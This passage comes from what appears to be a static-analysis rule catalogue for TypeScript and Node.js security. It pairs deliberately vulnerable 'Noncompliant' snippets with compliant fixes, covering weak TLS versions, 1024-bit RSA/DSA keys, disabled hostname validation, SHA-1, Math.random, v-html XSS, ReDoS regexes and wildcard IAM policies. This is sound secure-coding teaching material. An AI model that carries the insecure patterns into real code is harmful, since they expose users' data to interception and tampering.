The second is the combination of minVersion and maxVersion. Note that they cannot be specified along with the secureProtocol option:

const https = require('node:https');
const tls   = require('node:tls');

let options = {
  minVersion: 'TLSv1.1',  // Noncompliant
  maxVersion: 'TLSv1.2'
};

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

And secureOptions, which in this example instructs the OpenSSL protocol to turn off some algorithms altogether. In general, this option might trigger side effects and should be used carefully, if used at all.

const https     = require('node:https');
const tls       = require('node:tls');
const { constants } = require('node:crypto');

let options = {
  secureOptions:
    constants.SSL_OP_NO_SSLv2
    | constants.SSL_OP_NO_SSLv3
    | constants.SSL_OP_NO_TLSv1
}; // Noncompliant

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

Compliant solution

const https = require('node:https');
const tls   = require('node:tls');

let options = {
  secureProtocol: 'TLSv1_2_method'
};

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

The same can be achieved with minVersion and maxVersion:

const https = require('node:https');
const tls   = require('node:tls');

let options = {
  minVersion: 'TLSv1.2',
  maxVersion: 'TLSv1.2'
};

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

Here, the goal is to turn on only TLSv1.2 and higher, by turning off all lower versions:

const https = require('node:https');
const tls   = require('node:tls');
const { constants } = require('node:crypto');

let options = {
  secureOptions:
    constants.SSL_OP_NO_SSLv2
    | constants.SSL_OP_NO_SSLv3
    | constants.SSL_OP_NO_TLSv1
    | constants.SSL_OP_NO_TLSv1_1
};

let req    = https.request(options, (res) => { });
let socket = tls.connect(443, "www.example.com", options, () => { });

How does this work?

As a rule of thumb, by default you should use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The best choices at the moment are the following.

Use TLS v1.2 or TLS v1.3

Even though TLS v1.3 is available, using TLS v1.2 is still considered good and secure practice by the cryptography community.

The use of TLS v1.2 ensures compatibility with a wide range of platforms and enables seamless communication between different systems that do not yet have TLS v1.3 support.

The only drawback is that an outdated framework’s TLS v1.2 settings may enable older cipher suites that are now deprecated as insecure.

On the other hand, TLS v1.3 removes support for older and weaker cryptographic algorithms, eliminates known vulnerabilities from previous TLS versions, and improves performance.

Resources

Articles & blog posts

Standards

typescript:S2245

Using pseudorandom number generators (PRNGs) is security-sensitive. For example, it has led in the past to the following vulnerabilities:

When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.

As the Math.random() function relies on a weak pseudorandom number generator, this function should not be used for security-critical applications or for protecting sensitive data. In such context, a cryptographically strong pseudorandom number generator (CSPRNG) should be used instead.

Ask Yourself Whether

  • the code using the generated value requires it to be unpredictable. It is the case for all encryption mechanisms or when a secret value, such as a password, is hashed.
  • the function you use generates a value which can be predicted (pseudo-random).
  • the generated value is used multiple times.
  • an attacker can access the generated value.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Use a cryptographically strong pseudorandom number generator (CSPRNG) like crypto.getRandomValues().
  • Use the generated random values only once.
  • You should not expose the generated random value. If you have to store it, make sure that the database or file is secure.

Sensitive Code Example

const val = Math.random(); // Sensitive
// Check if val is used in a security context.

Compliant Solution

// === Client side ===
const crypto = window.crypto || window.msCrypto;
var array = new Uint32Array(1);
crypto.getRandomValues(array); // Compliant for security-sensitive use cases

// === Server side ===
const crypto = require('crypto');
const buf = crypto.randomBytes(1); // Compliant for security-sensitive use cases

See

typescript:S4426

This vulnerability exposes encrypted data to attacks whose goal is to recover the plaintext.

Why is this an issue?

Encryption algorithms are essential for protecting sensitive information and ensuring secure communications in a variety of domains. They are used for several important reasons:

  • Confidentiality, privacy, and intellectual property protection
  • Security during transmission or on storage devices
  • Data integrity, general trust, and authentication

When selecting encryption algorithms, tools, or combinations, you should also consider two things:

  1. No encryption is unbreakable.
  2. The strength of an encryption algorithm is usually measured by the effort required to crack it within a reasonable time frame.

In today’s cryptography, the length of the key directly affects the security level of cryptographic algorithms.

Note that depending on the algorithm, the term key refers to a different mathematical property. For example:

  • For RSA, the key is the product of two large prime numbers, also called the modulus.
  • For AES and Elliptic Curve Cryptography (ECC), the key is only a sequence of randomly generated bytes.
    • In some cases, AES keys are derived from a master key or a passphrase using a Key Derivation Function (KDF) like PBKDF2 (Password-Based Key Derivation Function 2)

If an application uses a key that is considered short and insecure, the encrypted data is exposed to attacks aimed at getting at the plaintext.

In general, it is best practice to expect a breach: that a user or organization with malicious intent will perform cryptographic attacks on this data after obtaining it by other means.

What is the potential impact?

After retrieving encrypted data and performing cryptographic attacks on it within a given timeframe, attackers can recover the plaintext that encryption was supposed to protect.

Depending on the recovered data, the impact may vary.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Additional attack surface

By modifying the plaintext of the encrypted message, an attacker may be able to trigger additional vulnerabilities in the code. An attacker can further exploit a system to obtain more information.
Encrypted values are often considered trustworthy because it would not be possible for a third party to modify them under normal circumstances.

Breach of confidentiality and privacy

When encrypted data contains personal or sensitive information, its retrieval by an attacker can lead to privacy violations, identity theft, financial loss, reputational damage, or unauthorized access to confidential systems.

In this scenario, the company, its employees, users, and partners could be seriously affected.

The impact is twofold, as data breaches and exposure of encrypted data can undermine trust in the organization, as customers, clients and stakeholders may lose confidence in the organization’s ability to protect their sensitive data.

Legal and compliance issues

In many industries and locations, there are legal and compliance requirements to protect sensitive data. If encrypted data is compromised and the plaintext can be recovered, companies face legal consequences, penalties, or violations of privacy laws.

How to fix it in Node.js

Code examples

The following code examples either explicitly or implicitly generate keys. Note that there are differences in the size of the keys depending on the algorithm.

Due to the mathematical properties of the algorithms, the security requirements for the key size vary depending on the algorithm.
For example, a 256-bit ECC key provides about the same level of security as a 3072-bit RSA key and a 128-bit symmetric key.

Noncompliant code example

Here is an example of a private key generation with RSA:

const crypto = require('crypto');

function callback(err, pub, priv) {}

var { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {
    modulusLength: 1024,  // Noncompliant
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  },
  callback);

Here is an example of a key generation with the Digital Signature Algorithm (DSA):

const crypto = require('crypto');

function callback(err, pub, priv) {}

var { privateKey, publicKey } = crypto.generateKeyPairSync('dsa', {
    modulusLength: 1024,  // Noncompliant
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  },
  callback);

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

const crypto = require('crypto');

function callback(err, pub, priv) {}

var { privateKey, publicKey } = crypto.generateKeyPair('ec', {
    namedCurve: 'secp112r2', // Noncompliant
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  },
  callback);

Compliant solution

Here is an example of a private key generation with RSA:

const crypto = require('crypto');

function callback(err, pub, priv) {}

var { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {
    modulusLength: 2048,
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  },
  callback);

Here is an example of a key generation with the Digital Signature Algorithm (DSA):

const crypto = require('crypto');

function callback(err, pub, priv) {}

var { privateKey, publicKey } = crypto.generateKeyPairSync('dsa', {
    modulusLength: 2048,
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  },
  callback);

Here is an example of an Elliptic Curve (EC) initialization. It implicitly generates a private key whose size is indicated in the algorithm name:

const crypto = require('crypto');

function callback(err, pub, priv) {}

var { privateKey, publicKey } = crypto.generateKeyPair('ec', {
    namedCurve: 'secp224k1',
    publicKeyEncoding:  { type: 'spki', format: 'pem' },
    privateKeyEncoding: { type: 'pkcs8', format: 'pem' }
  },
  callback);

How does this work?

As a rule of thumb, use the cryptographic algorithms and mechanisms that are considered strong by the cryptographic community.

The appropriate choices are the following.

RSA (Rivest-Shamir-Adleman) and DSA (Digital Signature Algorithm)

The security of these algorithms depends on the difficulty of attacks attempting to solve their underlying mathematical problem.

In general, a minimum key size of 2048 bits is recommended for both.

AES (Advanced Encryption Standard)

AES supports three key sizes: 128 bits, 192 bits and 256 bits. The security of the AES algorithm is based on the computational complexity of trying all possible keys.
A larger key size increases the number of possible keys and makes exhaustive search attacks computationally infeasible. Therefore, a 256-bit key provides a higher level of security than a 128-bit or 192-bit key.

Currently, a minimum key size of 128 bits is recommended for AES.

Elliptic Curve Cryptography (ECC)

Elliptic curve cryptography is also used in various algorithms, such as ECDSA, ECDH, or ECMQV. The length of keys generated with elliptic curve algorithms is indicated directly in their names. For example, secp256k1 generates a 256-bit private key.

Currently, a minimum key size of 224 bits is recommended for EC algorithms.

Going the extra mile

Pre-Quantum Cryptography

Encrypted data and communications recorded today could be decrypted in the future by an attack from a quantum computer.
It is important to keep in mind that NIST-approved digital signature schemes, key agreement, and key transport may need to be replaced with secure quantum-resistant (or "post-quantum") counterparts.

Thus, if data is to remain secure beyond 2030, proactive measures should be taken now to ensure its safety.


Resources

Articles & blog posts

Standards

typescript:S5757

Log management is an important topic, especially for the security of a web application: recording user activity, including that of potential attackers, lets an analyst understand what happened on the web application in case of malicious activity.

Retention of specific logs for a defined period of time is often necessary to comply with regulations such as GDPR, PCI DSS and others. However, to protect users’ privacy, certain information is forbidden or strongly discouraged from being logged, such as user passwords or credit card numbers, which obviously should not be stored, or at least not in clear text.

Ask Yourself Whether

In a production environment:

  • The web application uses confidential information and logs a significant amount of data.
  • Logs are externalized to SIEM or Big Data repositories.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Loggers should be configured with a list of confidential, personal information that will be hidden/masked or removed from logs.
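As a framework-agnostic sketch (maskSecrets is a hypothetical helper, not part of any logging library), confidential values can be masked before a message ever reaches the logger; the pattern mirrors the Signale example below:

```javascript
// Replace card-number-like sequences with a placeholder before logging.
function maskSecrets(message) {
  return message.replace(/([0-9]{4}-?)+/g, '[secure]');
}

console.log(maskSecrets('card = 1234-5678-0000-9999')); // card = [secure]
```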

Sensitive Code Example

With the Signale log management framework, the code is sensitive when an empty list of secrets is defined:

const { Signale } = require('signale');

const CREDIT_CARD_NUMBERS = fetchFromWebForm()
// here we suppose the credit card numbers are retrieved somewhere and CREDIT_CARD_NUMBERS looks like ["1234-5678-0000-9999", "1234-5678-0000-8888"]; for instance

const options = {
  secrets: []         // empty list of secrets
};

const logger = new Signale(options); // Sensitive

CREDIT_CARD_NUMBERS.forEach(function(CREDIT_CARD_NUMBER) {
  logger.log('The customer ordered products with the credit card number = %s', CREDIT_CARD_NUMBER);
});

Compliant Solution

With the Signale log management framework, it is possible to define a list of secrets that will be hidden in logs:

const { Signale } = require('signale');

const CREDIT_CARD_NUMBERS = fetchFromWebForm()
// here we suppose the credit card numbers are retrieved somewhere and CREDIT_CARD_NUMBERS looks like ["1234-5678-0000-9999", "1234-5678-0000-8888"]; for instance

const options = {
  secrets: ["([0-9]{4}-?)+"]
};

const logger = new Signale(options); // Compliant

CREDIT_CARD_NUMBERS.forEach(function(CREDIT_CARD_NUMBER) {
  logger.log('The customer ordered products with the credit card number = %s', CREDIT_CARD_NUMBER);
});

See

typescript:S3330

When a cookie is configured with the HttpOnly attribute set to true, the browser guarantees that no client-side script will be able to read it. In most cases, when a cookie is created, the default value of HttpOnly is false, and it is up to the developer to decide whether the content of the cookie can be read by client-side scripts. Because the majority of Cross-Site Scripting (XSS) attacks target the theft of session cookies, the HttpOnly attribute can help reduce their impact, as it won’t be possible to exploit the XSS vulnerability to steal session cookies.

Ask Yourself Whether

  • the cookie is sensitive and used to authenticate the user, for instance a session cookie
  • the HttpOnly attribute offers additional protection (which is not the case for an XSRF-TOKEN cookie / CSRF token, for example)

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • By default the HttpOnly flag should be set to true for most cookies, and it is mandatory for session / sensitive-security cookies.

Sensitive Code Example

cookie-session module:

let session = cookieSession({
  httpOnly: false, // Sensitive
});  // Sensitive

express-session module:

const express = require('express');
const session = require('express-session');

let app = express();
app.use(session({
  cookie:
  {
    httpOnly: false // Sensitive
  }
}));

cookies module:

let cookies = new Cookies(req, res, { keys: keys });

cookies.set('LastVisit', new Date().toISOString(), {
  httpOnly: false // Sensitive
}); // Sensitive

csurf module:

const cookieParser = require('cookie-parser');
const csrf = require('csurf');
const express = require('express');

let csrfProtection = csrf({ cookie: { httpOnly: false }}); // Sensitive

Compliant Solution

cookie-session module:

let session = cookieSession({
  httpOnly: true, // Compliant
});  // Compliant

express-session module:

const express = require('express');
const session = require('express-session');

let app = express();
app.use(session({
  cookie:
  {
    httpOnly: true // Compliant
  }
}));

cookies module:

let cookies = new Cookies(req, res, { keys: keys });

cookies.set('LastVisit', new Date().toISOString(), {
  httpOnly: true // Compliant
}); // Compliant

csurf module:

const cookieParser = require('cookie-parser');
const csrf = require('csurf');
const express = require('express');

let csrfProtection = csrf({ cookie: { httpOnly: true }}); // Compliant

See

typescript:S4784

This rule is deprecated; use S5852 instead.

Using regular expressions is security-sensitive. It has led in the past to the following vulnerabilities:

Evaluating regular expressions against input strings is potentially an extremely CPU-intensive task. Specially crafted regular expressions such as (a+)+s will take several seconds to evaluate the input string aaaaaaaaaaaaaaaaaaaaaaaaaaaaabs. The problem is that with every additional a character added to the input, the time required to evaluate the regex doubles. However, the equivalent regular expression, a+s (without grouping) is efficiently evaluated in milliseconds and scales linearly with the input size.
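The two patterns above accept exactly the same strings; a quick sketch can verify the equivalence on short inputs (kept deliberately short, since the nested form blows up exponentially on long non-matching input):

```javascript
// (a+)+s and a+s match the same language; only the flattened form
// evaluates in linear time on non-matching input such as "aaa...b".
const nested = /^(a+)+s$/;
const flattened = /^a+s$/;

for (const input of ['s', 'as', 'aaas', 'aaab']) {
  // Both patterns agree on every input
  console.log(input, nested.test(input), flattened.test(input));
}
```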

Evaluating such regular expressions opens the door to Regular expression Denial of Service (ReDoS) attacks. In the context of a web application, attackers can force the web server to spend all of its resources evaluating regular expressions thereby making the service inaccessible to genuine users.

This rule flags any execution of a hardcoded regular expression which has at least 3 characters and at least two instances of any of the following characters: *+{ .

Example: (a+)*

Ask Yourself Whether

  • the executed regular expression is sensitive and a user can provide a string that will be analyzed by it.
  • your regular expression engine's performance decreases with specially crafted inputs and regular expressions.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Check whether your regular expression engine (the algorithm executing your regular expression) has any known vulnerabilities. Search for vulnerability reports mentioning the engine you are using.

If possible, use a library that is not vulnerable to ReDoS attacks, such as Google RE2.

Remember also that a ReDoS attack is possible if a user-provided regular expression is executed. This rule won't detect that kind of injection.

Sensitive Code Example

const regex = /(a+)+b/; // Sensitive
const regex2 = new RegExp("(a+)+b"); // Sensitive

str.search("(a+)+b"); // Sensitive
str.match("(a+)+b"); // Sensitive
str.split("(a+)+b"); // Sensitive

Note: String.matchAll does not raise any issue as it is not supported by NodeJS.

Exceptions

Some corner-case regular expressions will not raise an issue even though they might be vulnerable. For example: (a|aa)+, (a|a?)+.

It is a good idea to test your regular expression if it has the same pattern on both sides of a "|".

See

typescript:S5759

Users often connect to web servers through HTTP proxies.

A proxy can be configured to forward the client IP address via the X-Forwarded-For or Forwarded HTTP headers.

An IP address is personal information that can identify a single user and thus impact their privacy.

Ask Yourself Whether

  • The web application uses reverse proxies or similar but doesn’t need to know the IP address of the user.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

The user's IP address should not be forwarded unless the application needs it, for example as part of an authentication or authorization scheme, or for log management.

Sensitive Code Example

node-http-proxy

var httpProxy = require('http-proxy');

httpProxy.createProxyServer({target:'http://localhost:9000', xfwd:true}) // Noncompliant
  .listen(8000);

http-proxy-middleware

var express = require('express');

const { createProxyMiddleware } = require('http-proxy-middleware');

const app = express();

app.use('/proxy', createProxyMiddleware({ target: 'http://localhost:9000', changeOrigin: true, xfwd: true })); // Noncompliant
app.listen(3000);

Compliant Solution

node-http-proxy

var httpProxy = require('http-proxy');

// By default xfwd option is false
httpProxy.createProxyServer({target:'http://localhost:9000'}) // Compliant
  .listen(8000);

http-proxy-middleware

var express = require('express');

const { createProxyMiddleware } = require('http-proxy-middleware');

const app = express();

// By default xfwd option is false
app.use('/proxy', createProxyMiddleware({ target: 'http://localhost:9000', changeOrigin: true})); // Compliant
app.listen(3000);

See

typescript:S6281

By default, S3 buckets are private, which means that only the bucket owner can access them.

This access control can be relaxed with ACLs or policies.

To prevent permissive policies or ACLs from being set on an S3 bucket, the following boolean settings can be enabled:

  • blockPublicAcls: whether to block public ACLs from being set on the S3 bucket.
  • ignorePublicAcls: whether to ignore existing public ACLs set on the S3 bucket.
  • blockPublicPolicy: whether to block public policies from being set on the S3 bucket.
  • restrictPublicBuckets: whether to restrict access to the S3 endpoints of public policies to the principals within the bucket owner account.

The other attribute, BlockPublicAccess.BLOCK_ACLS, only turns on blockPublicAcls and ignorePublicAcls; public policies can still affect the S3 bucket.

All of these options can be enabled at once by setting the blockPublicAccess property of the S3 bucket to BlockPublicAccess.BLOCK_ALL.

Ask Yourself Whether

  • The S3 bucket stores sensitive data.
  • The S3 bucket is not used to store static resources of websites (images, css …​).
  • Many users have the permission to set ACL or policy to the S3 bucket.
  • These settings are not already enforced to true at the account level.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to configure:

  • blockPublicAcls to true to block new attempts to set public ACLs.
  • ignorePublicAcls to true to ignore existing public ACLs.
  • blockPublicPolicy to true to block new attempts to set public policies.
  • restrictPublicBuckets to true to restrict existing public policies.

Sensitive Code Example

By default, when not set, blockPublicAccess is fully deactivated (nothing is blocked):

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket'
}); // Sensitive

This blockPublicAccess allows public ACLs to be set:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    blockPublicAccess: new s3.BlockPublicAccess({
        blockPublicAcls         : false, // Sensitive
        blockPublicPolicy       : true,
        ignorePublicAcls        : true,
        restrictPublicBuckets   : true
    })
});

The attribute BLOCK_ACLS only blocks and ignores public ACLs:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    blockPublicAccess: s3.BlockPublicAccess.BLOCK_ACLS // Sensitive
});

Compliant Solution

This blockPublicAccess blocks public ACLs and policies, ignores existing public ACLs and restricts existing public policies:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    blockPublicAccess: s3.BlockPublicAccess.BLOCK_ALL
});

A similar configuration to the one above can be obtained by setting all parameters of blockPublicAccess explicitly:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'id', {
    bucketName: 'bucket',
    blockPublicAccess: new s3.BlockPublicAccess({
        blockPublicAcls         : true,
        blockPublicPolicy       : true,
        ignorePublicAcls        : true,
        restrictPublicBuckets   : true
    })
});

See

typescript:S2255

This rule is deprecated, and will eventually be removed.

Using cookies is security-sensitive. It has led in the past to the following vulnerabilities:

Attackers can use widely-available tools to read cookies. Any sensitive information they may contain will be exposed.

This rule flags code that writes cookies.

Ask Yourself Whether

  • sensitive information is stored inside the cookie.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Cookies should only be used to manage the user session. The best practice is to keep all user-related information server-side and link it to the user session, never sending it to the client. In a few corner cases, cookies can be used for non-sensitive information that needs to live longer than the user session.

Do not try to encode sensitive information in a non-human-readable format before writing it to a cookie. The encoding can be reverted and the original information will be exposed.

Using cookies only for session IDs doesn’t make them secure. Follow OWASP best practices when you configure your cookies.

As a side note, any information read from a cookie should be sanitized.

Sensitive Code Example

// === Built-in NodeJS modules ===
const http = require('http');
const https = require('https');

http.createServer(function(req, res) {
  res.setHeader('Set-Cookie', ['type=ninja', 'lang=js']); // Sensitive
});
https.createServer(function(req, res) {
  res.setHeader('Set-Cookie', ['type=ninja', 'lang=js']); // Sensitive
});
// === ExpressJS ===
const express = require('express');
const app = express();
app.use(function(req, res, next) {
  res.cookie('name', 'John'); // Sensitive
});
// === In browser ===
// Set cookie
document.cookie = "name=John"; // Sensitive

See

typescript:S2817

This rule is deprecated, and will eventually be removed.

Why is this an issue?

The Web SQL Database standard never saw the light of day. It was first formulated, then deprecated by the W3C and was only implemented in some browsers. (It is not supported in Firefox or IE.)

Further, the use of a Web SQL Database poses security concerns, since you only need its name to access such a database.

Noncompliant code example

var db = window.openDatabase("myDb", "1.0", "Personal secrets stored here", 2*1024*1024);  // Noncompliant

Resources

typescript:S5527

This vulnerability allows attackers to impersonate a trusted host.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. In this process, the role of hostname validation, combined with certificate validation, is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When hostname validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

To do so, an attacker would obtain a valid certificate authenticating example.com, serve it using a different hostname, and the application code would still accept it.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable hostname validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate hostnames, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

How to fix it in Node.js

Code examples

The following code contains examples of disabled hostname validation.

The hostname validation gets disabled by overriding checkServerIdentity with an empty implementation. It is highly recommended to use the original implementation.

Noncompliant code example

const https = require('node:https');

let options = {
  hostname: 'www.example.com',
  port: 443,
  path: '/',
  method: 'GET',
  checkServerIdentity: function() {}, // Noncompliant
  secureProtocol: 'TLSv1_2_method'
};

let req = https.request(options, (res) => {
  res.on('data', (d) => {
    process.stdout.write(d);
  });
});
const tls = require('node:tls');

let options = {
  checkServerIdentity: function() {}, // Noncompliant
  secureProtocol: 'TLSv1_2_method'
};

let socket = tls.connect(443, "www.example.com", options, () => {
  process.stdin.pipe(socket);
  process.stdin.resume();
});

Compliant solution

const https = require('node:https');

let options = {
  hostname: 'www.example.com',
  port: 443,
  path: '/',
  method: 'GET',
  secureProtocol: 'TLSv1_2_method'
};

let req = https.request(options, (res) => {
  res.on('data', (d) => {
    process.stdout.write(d);
  });
});
const tls = require('node:tls');

let options = {
  secureProtocol: 'TLSv1_2_method'
};

let socket = tls.connect(443, "www.example.com", options, () => {
  process.stdin.pipe(socket);
  process.stdin.resume();
});

How does this work?

To fix the vulnerability of disabled hostname validation, it is strongly recommended to first re-enable the default validation and fix the root cause: the validity of the certificate.

Use valid certificates

If a hostname validation failure prevents connecting to the target server, keep in mind that one system’s code should not work around another system’s problems, as this creates unnecessary dependencies and can lead to reliability issues.

Therefore, the first solution is to change the remote host’s certificate to match its identity. If the remote host is not under your control, consider replicating its service to a server whose certificate you can change yourself.

In case the contacted host is located on a development machine, and if there is no other choice, try following this solution:

  • Create a self-signed certificate for that machine.
  • Add this self-signed certificate to the system’s trust store.
  • If the hostname is not localhost, add the hostname in the /etc/hosts file.

Resources

Standards

typescript:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, or SHA-3, are recommended. For password hashing, it is even better to use algorithms that are deliberately slow to compute, like bcrypt, scrypt, argon2, or pbkdf2, because this slows down brute-force attacks.

Sensitive Code Example

const crypto = require("crypto");

const hash = crypto.createHash('sha1'); // Sensitive

Compliant Solution

const crypto = require("crypto");

const hash = crypto.createHash('sha512'); // Compliant

See

typescript:S6299

The Vue.js framework prevents XSS vulnerabilities by automatically escaping HTML content, using native browser APIs like innerText instead of innerHTML.

It is still possible to explicitly use innerHTML and similar APIs to render HTML. Accidentally rendering malicious HTML data will introduce an XSS vulnerability in the application and enable a wide range of serious attacks, like accessing or modifying sensitive information or impersonating other users.

Ask Yourself Whether

The application needs to render HTML content which:

  • could be user-controlled and not previously sanitized.
  • was constructed in a way that is difficult to understand.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Avoid injecting HTML content with the v-html directive unless the content can be considered 100% safe; instead, rely as much as possible on built-in auto-escaping Vue.js features.
  • Take care when using the v-bind:href directive to set URLs, which can contain malicious JavaScript (javascript:onClick(...)).
  • Event directives like :onmouseover are also prone to JavaScript injection and should not be used with unsafe values.

Sensitive Code Example

When using Vue.js templates, the v-html directive enables HTML rendering without any sanitization:

<div v-html="htmlContent"></div> <!-- Noncompliant -->

When using a rendering function, the innerHTML attribute enables HTML rendering without any sanitization:

Vue.component('element', {
  render: function (createElement) {
    return createElement(
      'div',
      {
        domProps: {
          innerHTML: this.htmlContent, // Noncompliant
        }
      }
    );
  },
});

When using JSX, the domPropsInnerHTML attribute enables HTML rendering without any sanitization:

<div domPropsInnerHTML={this.htmlContent}></div> <!-- Noncompliant -->

Compliant Solution

When using Vue.js templates, putting the content as a child node of the element is safe:

<div>{{ htmlContent }}</div>

When using a rendering function, using the innerText attribute or putting the content as a child node of the element is safe:

Vue.component('element', {
  render: function (createElement) {
    return createElement(
      'div',
      {
        domProps: {
          innerText: this.htmlContent,
        }
      },
      this.htmlContent // Child node
    );
  },
});

When using JSX, putting the content as a child node of the element is safe:

<div>{this.htmlContent}</div>

See

typescript:S6304

A policy that allows identities to access all resources in an AWS account may violate the principle of least privilege. Suppose an identity has permission to access all resources even though it only requires access to some non-sensitive ones. In this case, unauthorized access to and disclosure of sensitive information can occur.

Ask Yourself Whether

The AWS account has more than one resource with different levels of sensitivity.

A risk exists if you answered yes to this question.

Recommended Secure Coding Practices

It's recommended to apply the least privilege principle, i.e., to only grant access to the necessary resources. A good practice to achieve this is to organize or tag resources depending on the sensitivity level of the data they store or process; managing secure access control is then less error-prone.

Sensitive Code Example

The wildcard "*" is specified as the resource for this PolicyStatement. This grants the update permission for all policies of the account:

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyDocument({
    statements: [
        new iam.PolicyStatement({
            effect: iam.Effect.ALLOW,
            actions: ["iam:CreatePolicyVersion"],
            resources: ["*"] // Sensitive
        })
    ]
})

Compliant Solution

Restrict the update permission to the appropriate subset of policies:

import { aws_iam as iam } from 'aws-cdk-lib'

new iam.PolicyDocument({
    statements: [
        new iam.PolicyStatement({
            effect: iam.Effect.ALLOW,
            actions: ["iam:CreatePolicyVersion"],
            resources: ["arn:aws:iam:::policy/team1/*"]
        })
    ]
})

Exceptions

  • Should not be raised on key policies (when AWS KMS actions are used).
  • Should not be raised on policies not using any resources (if and only if all actions in the policy never require resources).

See

typescript:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. This means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances of attackers to successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

url = "http://example.com"; // Sensitive
url = "ftp://anonymous@example.com"; // Sensitive
url = "telnet://anonymous@example.com"; // Sensitive

For nodemailer:

const nodemailer = require("nodemailer");
let transporter = nodemailer.createTransport({
  secure: false, // Sensitive
  requireTLS: false // Sensitive
});
const nodemailer = require("nodemailer");
let transporter = nodemailer.createTransport({}); // Sensitive

For ftp:

var Client = require('ftp');
var c = new Client();
c.connect({
  'secure': false // Sensitive
});

For telnet-client:

const Telnet = require('telnet-client'); // Sensitive

For aws-cdk-lib.aws-elasticloadbalancingv2.ApplicationLoadBalancer:

import { ApplicationLoadBalancer } from 'aws-cdk-lib/aws-elasticloadbalancingv2';

const alb = new ApplicationLoadBalancer(this, 'ALB', {
